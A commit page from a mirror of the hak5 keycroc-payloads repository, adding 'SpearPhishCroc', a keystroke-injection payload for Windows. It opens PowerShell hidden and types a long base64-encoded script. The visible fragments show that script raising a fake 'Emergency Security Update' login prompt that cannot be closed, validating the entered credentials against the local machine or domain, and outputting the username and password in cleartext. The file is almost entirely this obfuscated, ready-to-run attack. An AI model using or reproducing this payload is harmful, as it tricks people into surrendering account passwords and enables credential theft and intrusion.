hak5
/
keycroc-payloads
mirror of https://github.com/hak5/keycroc-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Created SpearPhishCroc 

Open up a popup demanding for user credentials - popup can't be closed without valid credentials.
Idea and code based on the famous Invoke-CredentialsPhish.
pull/33/head
0iphor13 2022-01-23 15:22:47 +01:00 committed by GitHub
parent e4818a2c4b
commit 0f9af57fad
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 77 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

77
payloads/library/phishing/SpearPhishCroc/payload.txt Normal file
View File

@ -0,0 +1,77 @@
#######################################################SpearPhishCroc############################################################
# Version 1.0
# OS: Windows
# Author: 0iphor13
# Idea and code based on Invoke-CredentialsPhish from Nikhil Mittal
################Trigger a popup, demanding for valid credentials, popup can't be closed without valid credentials################
MATCH phishy
export DUCKY_LANG=de
C2NOTIFY INFO 'SpearPhish attack started!'
########################################Opening Powershell hidden - Executing base64 encoded payload#############################
DELAY 1500
Q GUI r
Q DELAY 500
Q STRING powershell -NoP -NonI -w hidden
Q DELAY 250
Q ENTER
DELAY 200
Q STRING "powershell.exe -enc WwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAKQBdAA0ACgBQAGEAcgBhAG0AIAAoACkADQAKAA0ACgAgACAAIAAgACQARQBy"
Q DELAY 100
Q STRING "AHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgANAAoAIAAgACAAIABB"
Q DELAY 100
Q STRING "AGQAZAAtAFQAeQBwAGUAIAAtAGEAcwBzAGUAbQBiAGwAeQBuAGEAbQBlACAAcwB5AHMAdABlAG0ALgBEAGkAcgBlAGMAdABvAHIAeQBTAGUAcgB2AGkAYwBlA"
Q DELAY 100
Q STRING "HMALgBhAGMAYwBvAHUAbgB0AG0AYQBuAGEAZwBlAG0AZQBuAHQAIAANAAoAIAAgACAAIAAkAEQAUwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AH"
Q DELAY 100
Q STRING "MAdABlAG0ALgBEAGkAcgBlAGMAdABvAHIAeQBTAGUAcgB2AGkAYwBlAHMALgBBAGMAYwBvAHUAbgB0AE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAHIAaQBuAGM"
Q DELAY 100
Q STRING "AaQBwAGEAbABDAG8AbgB0AGUAeAB0ACgAWwBTAHkAcwB0AGUAbQAuAEQAaQByAGUAYwB0AG8AcgB5AFMAZQByAHYAaQBjAGUAcwAuAEEAYwBjAG8AdQBuAHQA"
Q DELAY 100
Q STRING "TQBhAG4AYQBnAGUAbQBlAG4AdAAuAEMAbwBuAHQAZQB4AHQAVAB5AHAAZQBdADoAOgBNAGEAYwBoAGkAbgBlACkADQAKACAAIAAgACAAJABkAG8AbQBhAGkAb"
Q DELAY 100
Q STRING "gBEAE4AIAA9ACAAIgBMAEQAQQBQADoALwAvACIAIAArACAAKABbAEEARABTAEkAXQAiACIAKQAuAGQAaQBzAHQAaQBuAGcAdQBpAHMAaABlAGQATgBhAG0AZQ"
Q DELAY 100
Q STRING "ANAAoAIAAgACAAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABjAHIAZQBkAGUAbgB0AGkAYQB"
Q DELAY 100
Q STRING "sACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAFAAcgBvAG0AcAB0AEYAbwByAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAiAEUAbQBlAHIAZwBlAG4AYwB5ACAAUwBlA"
Q DELAY 100
Q STRING "GMAdQByAGkAdAB5ACAAVQBwAGQAYQB0AGUAIgAsACAAIgBQAGwAZQBhAHMAZQAgAGUAbgB0AGUAcgAgAHkAbwB1AHIAIAB1AHMAZQByAG4AYQBtAGUAIABhAG4"
Q DELAY 100
Q STRING "AZAAgAHAAYQBzAHMAdwBvAHIAZAAuACIALAAgACIAIgAsACAAIgAiACkADQAKACAAIAAgACAAIAAgACAAIABpAGYAKAAkAGMAcgBlAGQAZQBuAHQAaQBhAGwAK"
Q DELAY 100
Q STRING "QANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwByAGUAZABzACAAPQAgACQAYwByAGUAZABlAG4AdABpAGEAbAAu"
Q DELAY 100
Q STRING "AEcAZQB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbAAoACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAHU"
Q DELAY 100
Q STRING "AcwBlAHIAIAA9ACAAJABjAHIAZQBkAHMALgB1AHMAZQByAG4AYQBtAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAHAAYQ"
Q DELAY 100
Q STRING "BzAHMAIAA9ACAAJABjAHIAZQBkAHMALgBwAGEAcwBzAHcAbwByAGQADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAGQAbwBtA"
Q DELAY 100
Q STRING "GEAaQBuACAAPQAgACQAYwByAGUAZABzAC4AZABvAG0AYQBpAG4ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYQB1AHQAaABsAG8AYwBhAGwAIAA9ACAAJ"
Q DELAY 100
Q STRING "ABEAFMALgBWAGEAbABpAGQAYQB0AGUAQwByAGUAZABlAG4AdABpAGEAbABzACgAJAB1AHMAZQByACwAIAAkAHAAYQBzAHMAKQANAAoAIAAgACAAIAAgACAAIAAgA"
Q DELAY 100
Q STRING "CAAIAAgACAAJABhAHUAdABoAGQAbwBtAGEAaQBuACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQByAGUAYwB0AG8AcgB5AFMAZQB"
Q DELAY 100
Q STRING "yAHYAaQBjAGUAcwAuAEQAaQByAGUAYwB0AG8AcgB5AEUAbgB0AHIAeQAoACQAZABvAG0AYQBpAG4ARABOACwAJAB1AHMAZQByACwAJABwAGEAcwBzACkADQAKACAA"
Q DELAY 100
Q STRING "IAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAoACgAJABhAHUAdABoAGwAbwBjAGEAbAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAAtAG8AcgAgACgAJABhAHUAdABoA"
Q DELAY 100
Q STRING "GQAbwBtAGEAaQBuAC4AbgBhAG0AZQAgAC0AbgBlACAAJABuAHUAbABsACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIA"
Q DELAY 100
Q STRING "AgACAAIAAgACAAIAAgACAAIAAkAG8AdQB0AHAAdQB0ACAAPQAgACIAVQBzAGUAcgBuAGEAbQBlADoAIAAiACAAKwAgACQAdQBzAGUAcgAgACsAIAAiACAAUABhAHMA"
Q DELAY 100
Q STRING "cwB3AG8AcgBkADoAIAAiACAAKwAgACQAcABhAHMAcwAgACsAIAAiACAARABvAG0AYQBpAG4AOgAiACAAKwAgACQAZABvAG0AYQBpAG4AIAArACAAIgAgAEQAbwBtAG"
Q DELAY 100
Q STRING "EAaQBuADoAIgArACAAJABhAHUAdABoAGQAbwBtAGEAaQBuAC4AbgBhAG0AZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG8AdQB0AHAAdQB0A"
Q DELAY 100
Q STRING "A0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAg"
Q DELAY 100
Q STRING "AH0ADQAKACAAIAAgACAAfQA="
Q DELAY 100
Q ENTER